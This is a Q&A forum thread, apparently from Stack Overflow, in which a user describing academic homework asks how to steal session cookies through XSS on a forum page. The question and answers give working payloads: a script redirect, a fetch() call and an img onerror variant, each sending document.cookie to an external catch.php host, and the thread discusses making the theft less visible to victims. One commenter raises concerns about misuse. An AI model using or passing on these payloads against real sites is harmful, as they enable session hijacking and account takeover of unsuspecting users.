# How to steal a cookie using XSS script?

Tags: javascript, cookies, xss

I have an academic homework where I need to steal the session cookie.

Since the application has a forum page, I made a publication with the following code and the cookie is indeed stolen

```
<script>
window.location='http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie='+document.cookie
</script>
```

catch.php is a script that stores the stolen information in a file and document.cookie is the parameter passed.

Is there any other way to store the stolen credentials like causing a GET request using an image?

Comment: An image request will not send any cookie. However you could use jquery

Comment: Sure you can create a `new Image('http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie='+document.cookie)`, but you still need scripting to access `document.cookie`

Comment: Or are you asking for the `<img src="notexist" onerror="xss()">` technique, instead of injecting a `<script>`?

Comment: @Bergi do I need to put the new Image code in script tag?

Comment: @FábioPires You need to execute the code in some way or another, yes. It's not quite clear whether your question is "*How do I cause a GET request using an image instead of `window.location`?*" or whether it is "*How do I run xss code using an image tag instead of a script tag?*". Please [edit] your post to ask only one of these.

Comment: @Bergi using an image. I will update my question

Comment: Your question is a bit vague. You say "other way to store the stolen credentials". What is the intention here? To list all possible attack scenarios? To better obscure the attack to the unsuspecting user (e.g. by not redirecting but loading the catch.php surreptitiously), by finding ways to direct user without being able to modifiy HTML code, to use other ways than script ... ?

Comment: Would ask these type of things on security.stackexchange.com. Especially since this type of knowledge can be used for attacks, not just academic purposes. (The information already widely exists out there, but still I would make sure this is handled responsibly, this is more likely on security.stackexchange.com than on stackoverflow.com).

Comment: Also, brush up on basic HTML and security knowledge first and make sure this is not a duplicate.

Comment: near duplicate https://security.stackexchange.com/questions/49185/xss-cookie-stealing-without-redirecting-to-another-page

Answer (score 1):

You can use `fetch` to send a request without changing the window location.

```js
fetch("http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie="+document.cookie);
```

Comment: what about disguising my script as an image?

Comment: @FábioPires you can try `<img src="non-existing-image.png" onerror="fetch('http://www.dei.isep.ipp.pt/~jpl/catch.php?cookie='+document.cookie);
" />`